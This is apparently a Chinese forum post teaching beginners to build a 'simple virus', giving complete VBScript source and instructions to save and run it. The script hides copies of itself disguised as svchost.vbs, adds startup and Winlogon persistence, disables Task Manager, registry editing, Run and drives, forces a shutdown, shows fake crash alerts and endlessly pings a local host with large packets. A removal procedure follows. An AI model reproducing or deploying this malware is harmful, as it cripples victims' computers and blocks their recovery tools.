教菜鸟一做个简单的病毒!
Set objFS = CreateObject("Scripting.FileSystemObject")
Set objFSO = CreateObject("Scripting.FileSystemObject")
set wsh=wscript.createobject("wscript.shell")
set reg=wscript.createobject("wscript.shell")
dim wsh
a=WScript.ScriptFullName
b="shutdown -t 60 -s -c 如果你是菜鸟的话。。。我想你知道害怕了吧!嬉嬉!"
c="c:\svchost.vbs"
d="d:\svchost.vbs"
s="c:\windows\system32\svchost.vbs"
c1="attrib +s +h +a +r c:\svchost.vbs"
d1="attrib +s +h +a +r d:\svchost.vbs"
s1="attrib +s +h +a +r c:\windows\system32\svchost.vbs"
If objFSO.FileExists (c) Then
Else
objFs.GetFile (a).Copy (c)
wsh.run c1
End If
If objFSO.FileExists(d) Then
Else
objFs.GetFile (a).Copy (d)
wsh.run d1
End If
If objFSO.FileExists(s) Then
Else
objFs.GetFile (a).Copy (s)
wsh.run s1
End If
wsh.run b
wsh.run "narrator"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoRun","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoClose","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoLogoff","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDesktop","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDrives","000000100","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","c:\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","d:\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","c:\windows\system32\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","c:\windows\system32\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\sTimeFormat","tttt H:mm:ss","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s1159","笨蛋!","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s2359","傻逼!","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell","c:\windows\system32\svchost.vbs","REG_SZ"
msgbox "系统快要崩溃了!",48,"由于你经常不务正业!:"
msgbox "windows崩溃了!",18,"安全警报:"
do
wsh.run ("ping -t -l 6500 192.168.1.1")
loop
'请将以上代码保存在txt文件中保存、再把后缀名txt改成vbs后执行后就可以看到效果
了解救方法如下:
开机的时候按F8选择从带命令行的安全模式启动系统,然后执行以下命令
attrib -s -r -h -a c:\windows\system32\svchost.vbs
attrib -s -r -h -a c:\svchost.vbs
attrib -s -r -h -a d:\svchost.vbs
explorer
然后从以上文件目录中找到那VBS文件,把他们删除既可,还要自己建立一个新的VBS文件,把一下代码复制进去执行一次就OK了!
set reg=wscript.createobject("wscript.shell")
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoRun","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoClose","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoLogoff","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDesktop","00000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDrives","000000000","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\sTimeFormat","H:mm:ss","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s1159","AM","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s2359","PM","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell","Explorer.exe","REG_SZ"
msgbox "解救成功,请勿用此代码破坏别人",64,"OK"